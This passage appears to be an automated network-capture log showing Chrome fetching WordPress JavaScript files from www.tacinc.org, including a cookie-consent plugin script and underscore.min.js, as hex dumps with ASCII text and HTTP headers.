                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC1369INData Raw: 58 50 49 52 45 29 2c 69 2e 70 72 6f 70 28 22 63 68 65 63 6b 65 64 22 2c 21 31 29 29 2c 43 4c 49 2e 63 68 65 63 6b 43 61 74 65 67 6f 72 69 65 73 28 29 2c 43 4c 49 2e 67 65 6e 65 72 61 74 65 43 6f 6e 73 65 6e 74 28 29 7d 29 7d 2c 73 65 74 74 69 6e 67 73 50 6f 70 55 70 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 6a 51 75 65 72 79 28 64 6f 63 75 6d 65 6e 74 29 2e 6f 6e 28 22 63 6c 69 63 6b 22 2c 22 2e 63 6c 69 5f 73 65 74 74 69 6e 67 73 5f 62 75 74 74 6f 6e 22 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 43 4c 49 2e 73 65 74 74 69 6e 67 73 4d 6f 64 61 6c 2e 61 64 64 43 6c 61 73 73 28 22 63 6c 69 2d 73 68 6f 77 22 29 2e 63 73 73 28 7b 6f 70 61 63 69 74 79 3a 30 7d 29 2e 61 6e 69 6d 61 74 65 28 7b 6f 70 61 63 69 74 79
                                                                                                                                                                                                                              Data Ascii: XPIRE),i.prop("checked",!1)),CLI.checkCategories(),CLI.generateConsent()})},settingsPopUp:function(){jQuery(document).on("click",".cli_settings_button",function(e){e.preventDefault(),CLI.settingsModal.addClass("cli-show").css({opacity:0}).animate({opacity
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC1369INData Raw: 22 29 2c 6a 51 75 65 72 79 28 74 68 69 73 29 2e 73 69 62 6c 69 6e 67 73 28 22 2e 63 6c 69 2d 74 61 62 2d 63 6f 6e 74 65 6e 74 22 29 2e 73 6c 69 64 65 55 70 28 32 30 30 29 29 3a 28 6a 51 75 65 72 79 28 22 2e 63 6c 69 2d 74 61 62 2d 68 65 61 64 65 72 22 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 63 6c 69 2d 74 61 62 2d 61 63 74 69 76 65 22 29 2c 6a 51 75 65 72 79 28 74 68 69 73 29 2e 61 64 64 43 6c 61 73 73 28 22 63 6c 69 2d 74 61 62 2d 61 63 74 69 76 65 22 29 2c 6a 51 75 65 72 79 28 22 2e 63 6c 69 2d 74 61 62 2d 63 6f 6e 74 65 6e 74 22 29 2e 73 6c 69 64 65 55 70 28 32 30 30 29 2c 6a 51 75 65 72 79 28 74 68 69 73 29 2e 73 69 62 6c 69 6e 67 73 28 22 2e 63 6c 69 2d 74 61 62 2d 63 6f 6e 74 65 6e 74 22 29 2e 73 6c 69 64 65 44 6f 77 6e 28 32 30 30 29 29 29 7d
                                                                                                                                                                                                                              Data Ascii: "),jQuery(this).siblings(".cli-tab-content").slideUp(200)):(jQuery(".cli-tab-header").removeClass("cli-tab-active"),jQuery(this).addClass("cli-tab-active"),jQuery(".cli-tab-content").slideUp(200),jQuery(this).siblings(".cli-tab-content").slideDown(200)))}
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC1369INData Raw: 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 20 69 6e 20 43 4c 49 5f 43 6f 6f 6b 69 65 2e 65 72 61 73 65 28 43 4c 49 5f 41 43 43 45 50 54 5f 43 4f 4f 4b 49 45 5f 4e 41 4d 45 29 2c 43 6c 69 5f 44 61 74 61 2e 6e 6e 5f 63 6f 6f 6b 69 65 5f 69 64 73 29 43 4c 49 5f 43 6f 6f 6b 69 65 2e 65 72 61 73 65 28 43 6c 69 5f 44 61 74 61 2e 6e 6e 5f 63 6f 6f 6b 69 65 5f 69 64 73 5b 74 5d 29 3b 72 65 74 75 72 6e 20 43 4c 49 2e 67 65 6e 65 72 61 74 65 43 6f 6e 73 65 6e 74 28 29 2c 21 31 7d 29 7d 2c 63 6f 6e 66 69 67 42 75 74 74 6f 6e 73 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 6d 61 69 6e 5f 62 75 74 74 6f 6e 2e 63 73 73 28 22 63 6f 6c 6f 72 22 2c 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 62 75 74 74 6f 6e 5f 31 5f 6c 69 6e 6b 5f 63
                                                                                                                                                                                                                              Data Ascii: ck",function(e){for(var t in CLI_Cookie.erase(CLI_ACCEPT_COOKIE_NAME),Cli_Data.nn_cookie_ids)CLI_Cookie.erase(Cli_Data.nn_cookie_ids[t]);return CLI.generateConsent(),!1})},configButtons:function(){this.main_button.css("color",this.settings.button_1_link_c
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC1369INData Raw: 6f 6c 6f 72 22 2c 43 4c 49 2e 73 65 74 74 69 6e 67 73 2e 62 75 74 74 6f 6e 5f 33 5f 62 75 74 74 6f 6e 5f 63 6f 6c 6f 75 72 29 7d 29 29 2c 74 68 69 73 2e 73 65 74 74 69 6e 67 73 5f 62 75 74 74 6f 6e 2e 63 73 73 28 22 63 6f 6c 6f 72 22 2c 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 62 75 74 74 6f 6e 5f 34 5f 6c 69 6e 6b 5f 63 6f 6c 6f 75 72 29 2c 42 6f 6f 6c 65 61 6e 28 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 62 75 74 74 6f 6e 5f 34 5f 61 73 5f 62 75 74 74 6f 6e 29 26 26 28 74 68 69 73 2e 73 65 74 74 69 6e 67 73 5f 62 75 74 74 6f 6e 2e 63 73 73 28 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 22 2c 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 62 75 74 74 6f 6e 5f 34 5f 62 75 74 74 6f 6e 5f 63 6f 6c 6f 75 72 29 2c 74 68 69 73 2e 73 65 74 74 69 6e 67 73 5f
                                                                                                                                                                                                                              Data Ascii: olor",CLI.settings.button_3_button_colour)})),this.settings_button.css("color",this.settings.button_4_link_colour),Boolean(this.settings.button_4_as_button)&&(this.settings_button.css("background-color",this.settings.button_4_button_colour),this.settings_
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC1369INData Raw: 6f 70 74 2d 6f 75 74 2c 2e 77 74 2d 63 6c 69 2d 63 63 70 61 2d 63 68 65 63 6b 62 6f 78 2c 2e 77 74 2d 63 6c 69 2d 63 63 70 61 2d 65 6c 65 6d 65 6e 74 22 29 2e 72 65 6d 6f 76 65 28 29 29 2c 74 68 69 73 2e 73 68 6f 77 61 67 61 69 6e 5f 65 6c 6d 2e 6f 6e 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 28 29 2c 43 4c 49 2e 73 68 6f 77 61 67 61 69 6e 5f 65 6c 6d 2e 73 6c 69 64 65 55 70 28 43 4c 49 2e 73 65 74 74 69 6e 67 73 2e 61 6e 69 6d 61 74 65 5f 73 70 65 65 64 5f 68 69 64 65 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 43 4c 49 2e 62 61 72 5f 65 6c 6d 2e 73 6c 69 64 65 44 6f 77 6e 28 43 4c 49 2e 73 65 74 74 69 6e 67 73 2e 61 6e 69 6d 61 74 65 5f 73 70 65 65 64 5f 73 68 6f 77 29 2c 43 4c 49 5f 43 4f 4f
                                                                                                                                                                                                                              Data Ascii: opt-out,.wt-cli-ccpa-checkbox,.wt-cli-ccpa-element").remove()),this.showagain_elm.on("click",function(e){e.preventDefault(),CLI.showagain_elm.slideUp(CLI.settings.animate_speed_hide,function(){CLI.bar_elm.slideDown(CLI.settings.animate_speed_show),CLI_COO
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC1369INData Raw: 69 73 2e 73 65 74 74 69 6e 67 73 2e 6e 6f 74 69 66 79 5f 70 6f 73 69 74 69 6f 6e 5f 76 65 72 74 69 63 61 6c 3f 74 68 69 73 2e 73 68 6f 77 61 67 61 69 6e 5f 63 6f 6e 66 69 67 2e 74 6f 70 3d 22 30 22 3a 22 62 6f 74 74 6f 6d 22 3d 3d 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 6e 6f 74 69 66 79 5f 70 6f 73 69 74 69 6f 6e 5f 76 65 72 74 69 63 61 6c 26 26 28 74 68 69 73 2e 62 61 72 5f 63 6f 6e 66 69 67 2e 70 6f 73 69 74 69 6f 6e 3d 22 66 69 78 65 64 22 2c 74 68 69 73 2e 62 61 72 5f 63 6f 6e 66 69 67 2e 62 6f 74 74 6f 6d 3d 22 30 22 2c 74 68 69 73 2e 73 68 6f 77 61 67 61 69 6e 5f 63 6f 6e 66 69 67 2e 62 6f 74 74 6f 6d 3d 22 30 22 29 2c 22 6c 65 66 74 22 3d 3d 74 68 69 73 2e 73 65 74 74 69 6e 67 73 2e 6e 6f 74 69 66 79 5f 70 6f 73 69 74 69 6f 6e 5f 68 6f 72 69 7a
                                                                                                                                                                                                                              Data Ascii: is.settings.notify_position_vertical?this.showagain_config.top="0":"bottom"==this.settings.notify_position_vertical&&(this.bar_config.position="fixed",this.bar_config.bottom="0",this.showagain_config.bottom="0"),"left"==this.settings.notify_position_horiz


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              104192.168.2.649838141.193.213.114431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC472OUTGET /wp-includes/js/underscore.min.js HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:10 GMT
                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Last-Modified: Thu, 26 Sep 2024 13:59:34 GMT
                                                                                                                                                                                                                              ETag: W/"66f568c6-4991"
                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                              Age: 614821
                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                              CF-RAY: 8d73a5e4ef8ae7e3-DFW
                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC877INData Raw: 34 39 39 31 0d 0a 2f 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 6e 2c 72 29 7b 76 61 72 20 74 2c 65 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 72 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 75 6e 64 65 72 73 63 6f 72 65 22 2c 72 29 3a 28 6e 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 67 6c 6f 62 61 6c 54 68 69 73 3f 67 6c 6f 62 61 6c 54 68 69 73 3a 6e 7c 7c 73 65 6c 66 2c 74 3d 6e 2e 5f
                                                                                                                                                                                                                              Data Ascii: 4991/*! This file is auto-generated */!function(n,r){var t,e;"object"==typeof exports&&"undefined"!=typeof module?module.exports=r():"function"==typeof define&&define.amd?define("underscore",r):(n="undefined"!=typeof globalThis?globalThis:n||self,t=n._
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC1369INData Raw: 61 62 6c 65 22 2c 22 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 22 2c 22 74 6f 4c 6f 63 61 6c 65 53 74 72 69 6e 67 22 5d 2c 47 3d 4d 61 74 68 2e 70 6f 77 28 32 2c 35 33 29 2d 31 3b 66 75 6e 63 74 69 6f 6e 20 6c 28 75 2c 6f 29 7b 72 65 74 75 72 6e 20 6f 3d 6e 75 6c 6c 3d 3d 6f 3f 75 2e 6c 65 6e 67 74 68 2d 31 3a 2b 6f 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 76 61 72 20 6e 3d 4d 61 74 68 2e 6d 61 78 28 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 2d 6f 2c 30 29 2c 72 3d 41 72 72 61 79 28 6e 29 2c 74 3d 30 3b 74 3c 6e 3b 74 2b 2b 29 72 5b 74 5d 3d 61 72 67 75 6d 65 6e 74 73 5b 74 2b 6f 5d 3b 73 77 69 74 63 68 28 6f 29 7b 63 61 73 65 20 30 3a 72 65 74 75 72 6e 20 75 2e 63 61 6c 6c 28 74 68 69 73 2c 72 29 3b 63 61 73 65 20 31 3a 72 65 74 75 72 6e 20
                                                                                                                                                                                                                              Data Ascii: able","hasOwnProperty","toLocaleString"],G=Math.pow(2,53)-1;function l(u,o){return o=null==o?u.length-1:+o,function(){for(var n=Math.max(arguments.length-o,0),r=Array(n),t=0;t<n;t++)r[t]=arguments[t+o];switch(o){case 0:return u.call(this,r);case 1:return
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC1369INData Raw: 28 72 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 6e 3d 72 28 6e 29 3b 72 65 74 75 72 6e 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 6e 26 26 30 3c 3d 6e 26 26 6e 3c 3d 47 7d 7d 66 75 6e 63 74 69 6f 6e 20 73 6e 28 72 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 6e 3f 76 6f 69 64 20 30 3a 6e 5b 72 5d 7d 7d 76 61 72 20 64 3d 73 6e 28 22 62 79 74 65 4c 65 6e 67 74 68 22 29 2c 70 6e 3d 6c 6e 28 64 29 2c 68 6e 3d 2f 5c 5b 6f 62 6a 65 63 74 20 28 28 49 7c 55 69 29 6e 74 28 38 7c 31 36 7c 33 32 29 7c 46 6c 6f 61 74 28 33 32 7c 36 34 29 7c 55 69 6e 74 38 43 6c 61 6d 70 65 64 7c 42 69 67 28 49 7c 55 69 29 6e 74 36 34 29 41 72 72 61 79 5c 5d 2f 3b 76 61 72 20 76 6e 3d 74 3f 66 75 6e
                                                                                                                                                                                                                              Data Ascii: (r){return function(n){n=r(n);return"number"==typeof n&&0<=n&&n<=G}}function sn(r){return function(n){return null==n?void 0:n[r]}}var d=sn("byteLength"),pn=ln(d),hn=/\[object ((I|Ui)nt(8|16|32)|Float(32|64)|Uint8Clamped|Big(I|Ui)nt64)Array\]/;var vn=t?fun
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC1369INData Raw: 6f 6e 22 3d 3d 28 75 3d 74 79 70 65 6f 66 20 6e 29 7c 7c 22 6f 62 6a 65 63 74 22 3d 3d 75 7c 7c 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 72 29 26 26 66 75 6e 63 74 69 6f 6e 20 6e 28 72 2c 74 2c 65 2c 75 29 7b 72 20 69 6e 73 74 61 6e 63 65 6f 66 20 6d 26 26 28 72 3d 72 2e 5f 77 72 61 70 70 65 64 29 3b 74 20 69 6e 73 74 61 6e 63 65 6f 66 20 6d 26 26 28 74 3d 74 2e 5f 77 72 61 70 70 65 64 29 3b 76 61 72 20 6f 3d 73 2e 63 61 6c 6c 28 72 29 3b 69 66 28 6f 21 3d 3d 73 2e 63 61 6c 6c 28 74 29 29 72 65 74 75 72 6e 21 31 3b 69 66 28 75 6e 26 26 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 3d 3d 6f 26 26 68 28 72 29 29 7b 69 66 28 21 68 28 74 29 29 72 65 74 75 72 6e 21 31 3b 6f 3d 62 6e 7d 73 77 69 74 63 68 28 6f 29 7b 63 61 73 65 22 5b 6f 62 6a 65
                                                                                                                                                                                                                              Data Ascii: on"==(u=typeof n)||"object"==u||"object"==typeof r)&&function n(r,t,e,u){r instanceof m&&(r=r._wrapped);t instanceof m&&(t=t._wrapped);var o=s.call(r);if(o!==s.call(t))return!1;if(un&&"[object Object]"==o&&h(r)){if(!h(t))return!1;o=bn}switch(o){case"[obje
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC1369INData Raw: 69 66 28 67 28 72 29 29 72 65 74 75 72 6e 21 31 3b 66 6f 72 28 76 61 72 20 74 3d 30 3b 74 3c 75 3b 74 2b 2b 29 69 66 28 21 70 28 6e 5b 65 5b 74 5d 5d 29 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 20 65 21 3d 3d 77 6e 7c 7c 21 70 28 6e 5b 5f 6e 5d 29 7d 7d 76 61 72 20 5f 6e 3d 22 66 6f 72 45 61 63 68 22 2c 72 3d 5b 22 63 6c 65 61 72 22 2c 22 64 65 6c 65 74 65 22 5d 2c 75 3d 5b 22 67 65 74 22 2c 22 68 61 73 22 2c 22 73 65 74 22 5d 2c 55 3d 72 2e 63 6f 6e 63 61 74 28 5f 6e 2c 75 29 2c 77 6e 3d 72 2e 63 6f 6e 63 61 74 28 75 29 2c 74 3d 5b 22 61 64 64 22 5d 2e 63 6f 6e 63 61 74 28 72 2c 5f 6e 2c 22 68 61 73 22 29 2c 75 3d 61 3f 6a 6e 28 55 29 3a 69 28 22 4d 61 70 22 29 2c 72 3d 61 3f 6a 6e 28 77 6e 29 3a 69 28 22 57 65 61 6b 4d 61 70 22 29 2c 55 3d 61 3f
                                                                                                                                                                                                                              Data Ascii: if(g(r))return!1;for(var t=0;t<u;t++)if(!p(n[e[t]]))return!1;return e!==wn||!p(n[_n])}}var _n="forEach",r=["clear","delete"],u=["get","has","set"],U=r.concat(_n,u),wn=r.concat(u),t=["add"].concat(r,_n,"has"),u=a?jn(U):i("Map"),r=a?jn(wn):i("WeakMap"),U=a?
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC1369INData Raw: 72 6e 20 75 2e 63 61 6c 6c 28 6f 2c 6e 2c 72 2c 74 29 7d 3b 63 61 73 65 20 34 3a 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 6e 2c 72 2c 74 2c 65 29 7b 72 65 74 75 72 6e 20 75 2e 63 61 6c 6c 28 6f 2c 6e 2c 72 2c 74 2c 65 29 7d 7d 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 75 2e 61 70 70 6c 79 28 6f 2c 61 72 67 75 6d 65 6e 74 73 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 44 6e 28 6e 2c 72 2c 74 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 6e 3f 54 6e 3a 70 28 6e 29 3f 78 28 6e 2c 72 2c 74 29 3a 28 6f 28 6e 29 26 26 21 76 28 6e 29 3f 41 3a 6b 6e 29 28 6e 29 7d 66 75 6e 63 74 69 6f 6e 20 52 6e 28 6e 2c 72 29 7b 72 65 74 75 72 6e 20 44 6e 28 6e 2c 72 2c 31 2f 30 29 7d 66 75 6e 63 74 69 6f 6e 20 53 28 6e 2c 72 2c 74 29 7b 72 65 74
                                                                                                                                                                                                                              Data Ascii: rn u.call(o,n,r,t)};case 4:return function(n,r,t,e){return u.call(o,n,r,t,e)}}return function(){return u.apply(o,arguments)}}function Dn(n,r,t){return null==n?Tn:p(n)?x(n,r,t):(o(n)&&!v(n)?A:kn)(n)}function Rn(n,r){return Dn(n,r,1/0)}function S(n,r,t){ret
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC1369INData Raw: 63 65 68 6f 6c 64 65 72 3d 6d 2c 6c 28 66 75 6e 63 74 69 6f 6e 28 72 2c 74 2c 65 29 7b 76 61 72 20 75 3b 69 66 28 70 28 72 29 29 72 65 74 75 72 6e 20 75 3d 6c 28 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 4a 6e 28 72 2c 75 2c 74 2c 74 68 69 73 2c 65 2e 63 6f 6e 63 61 74 28 6e 29 29 7d 29 3b 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28 22 42 69 6e 64 20 6d 75 73 74 20 62 65 20 63 61 6c 6c 65 64 20 6f 6e 20 61 20 66 75 6e 63 74 69 6f 6e 22 29 7d 29 29 2c 45 3d 6c 6e 28 67 29 3b 66 75 6e 63 74 69 6f 6e 20 42 28 6e 2c 72 2c 74 2c 65 29 7b 69 66 28 65 3d 65 7c 7c 5b 5d 2c 72 7c 7c 30 3d 3d 3d 72 29 7b 69 66 28 72 3c 3d 30 29 72 65 74 75 72 6e 20 65 2e 63 6f 6e 63 61 74 28 6e 29 7d 65 6c 73 65 20 72 3d 31 2f 30 3b 66 6f 72 28 76 61
                                                                                                                                                                                                                              Data Ascii: ceholder=m,l(function(r,t,e){var u;if(p(r))return u=l(function(n){return Jn(r,u,t,this,e.concat(n))});throw new TypeError("Bind must be called on a function")})),E=ln(g);function B(n,r,t,e){if(e=e||[],r||0===r){if(r<=0)return e.concat(n)}else r=1/0;for(va
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC1369INData Raw: 6c 73 65 20 69 66 28 61 26 26 74 26 26 75 29 72 65 74 75 72 6e 20 6e 5b 74 3d 61 28 6e 2c 72 29 5d 3d 3d 3d 72 3f 74 3a 2d 31 3b 69 66 28 72 21 3d 72 29 72 65 74 75 72 6e 20 30 3c 3d 28 74 3d 69 28 66 2e 63 61 6c 6c 28 6e 2c 65 2c 75 29 2c 66 6e 29 29 3f 74 2b 65 3a 2d 31 3b 66 6f 72 28 74 3d 30 3c 6f 3f 65 3a 75 2d 31 3b 30 3c 3d 74 26 26 74 3c 75 3b 74 2b 3d 6f 29 69 66 28 6e 5b 74 5d 3d 3d 3d 72 29 72 65 74 75 72 6e 20 74 3b 72 65 74 75 72 6e 2d 31 7d 7d 76 61 72 20 61 72 3d 69 72 28 31 2c 65 72 2c 6f 72 29 2c 66 72 3d 69 72 28 2d 31 2c 75 72 29 3b 66 75 6e 63 74 69 6f 6e 20 63 72 28 6e 2c 72 2c 74 29 7b 72 3d 28 45 28 6e 29 3f 65 72 3a 72 72 29 28 6e 2c 72 2c 74 29 3b 69 66 28 76 6f 69 64 20 30 21 3d 3d 72 26 26 2d 31 21 3d 3d 72 29 72 65 74 75 72 6e
                                                                                                                                                                                                                              Data Ascii: lse if(a&&t&&u)return n[t=a(n,r)]===r?t:-1;if(r!=r)return 0<=(t=i(f.call(n,e,u),fn))?t+e:-1;for(t=0<o?e:u-1;0<=t&&t<u;t+=o)if(n[t]===r)return t;return-1}}var ar=ir(1,er,or),fr=ir(-1,ur);function cr(n,r,t){r=(E(n)?er:rr)(n,r,t);if(void 0!==r&&-1!==r)return
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC1369INData Raw: 6e 20 6e 75 6c 6c 3d 3d 72 3f 72 3a 72 2e 61 70 70 6c 79 28 6e 2c 65 29 7d 29 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 64 72 28 6e 2c 72 29 7b 72 65 74 75 72 6e 20 49 28 6e 2c 6b 6e 28 72 29 29 7d 66 75 6e 63 74 69 6f 6e 20 67 72 28 6e 2c 65 2c 72 29 7b 76 61 72 20 74 2c 75 2c 6f 3d 2d 31 2f 30 2c 69 3d 2d 31 2f 30 3b 69 66 28 6e 75 6c 6c 3d 3d 65 7c 7c 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 6f 62 6a 65 63 74 22 21 3d 74 79 70 65 6f 66 20 6e 5b 30 5d 26 26 6e 75 6c 6c 21 3d 6e 29 66 6f 72 28 76 61 72 20 61 3d 30 2c 66 3d 28 6e 3d 45 28 6e 29 3f 6e 3a 6a 28 6e 29 29 2e 6c 65 6e 67 74 68 3b 61 3c 66 3b 61 2b 2b 29 6e 75 6c 6c 21 3d 28 74 3d 6e 5b 61 5d 29 26 26 6f 3c 74 26 26 28 6f 3d 74 29 3b 65 6c 73 65 20 65 3d 53 28 65 2c 72 29 2c 4e
                                                                                                                                                                                                                              Data Ascii: n null==r?r:r.apply(n,e)})});function dr(n,r){return I(n,kn(r))}function gr(n,e,r){var t,u,o=-1/0,i=-1/0;if(null==e||"number"==typeof e&&"object"!=typeof n[0]&&null!=n)for(var a=0,f=(n=E(n)?n:j(n)).length;a<f;a++)null!=(t=n[a])&&o<t&&(o=t);else e=S(e,r),N
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC1369INData Raw: 72 2c 74 29 7b 72 65 74 75 72 6e 20 66 2e 63 61 6c 6c 28 6e 2c 30 2c 4d 61 74 68 2e 6d 61 78 28 30 2c 6e 2e 6c 65 6e 67 74 68 2d 28 6e 75 6c 6c 3d 3d 72 7c 7c 74 3f 31 3a 72 29 29 29 7d 66 75 6e 63 74 69 6f 6e 20 42 72 28 6e 2c 72 2c 74 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 6e 7c 7c 6e 2e 6c 65 6e 67 74 68 3c 31 3f 6e 75 6c 6c 3d 3d 72 7c 7c 74 3f 76 6f 69 64 20 30 3a 5b 5d 3a 6e 75 6c 6c 3d 3d 72 7c 7c 74 3f 6e 5b 30 5d 3a 45 72 28 6e 2c 6e 2e 6c 65 6e 67 74 68 2d 72 29 7d 66 75 6e 63 74 69 6f 6e 20 52 28 6e 2c 72 2c 74 29 7b 72 65 74 75 72 6e 20 66 2e 63 61 6c 6c 28 6e 2c 6e 75 6c 6c 3d 3d 72 7c 7c 74 3f 31 3a 72 29 7d 76 61 72 20 4e 72 3d 6c 28 66 75 6e 63 74 69 6f 6e 28 6e 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 42 28 72 2c 21 30 2c 21 30 29 2c
                                                                                                                                                                                                                              Data Ascii: r,t){return f.call(n,0,Math.max(0,n.length-(null==r||t?1:r)))}function Br(n,r,t){return null==n||n.length<1?null==r||t?void 0:[]:null==r||t?n[0]:Er(n,n.length-r)}function R(n,r,t){return f.call(n,null==r||t?1:r)}var Nr=l(function(n,r){return r=B(r,!0,!0),


                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                              105192.168.2.649839141.193.213.114431424C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC513OUTGET /wp-content/uploads/hummingbird-assets/c32f45114cc801a4d6b3b663b88bcf96.js HTTP/1.1
                                                                                                                                                                                                                              Host: www.tacinc.org
                                                                                                                                                                                                                              Connection: keep-alive
                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                              Accept: */*
                                                                                                                                                                                                                              Sec-Fetch-Site: none
                                                                                                                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                              Cookie: _pk_id.42744.d7a4=9e2e685fff1c48d6.1729706647.1.1729706647.1729706647.; _pk_ses.42744.d7a4=1
                                                                                                                                                                                                                              2024-10-23 18:04:10 UTC492INHTTP/1.1 200 OK
                                                                                                                                                                                                                              Date: Wed, 23 Oct 2024 18:04:10 GMT
                                                                                                                                                                                                                              Content-Type: application/javascript
                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                              Last-Modified: Wed, 16 Oct 2024 14:55:48 GMT
                                                                                                                                                                                                                              ETag: W/"670fd3f4-521f"
                                                                                                                                                                                                                              Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                              CF-Cache-Status: HIT
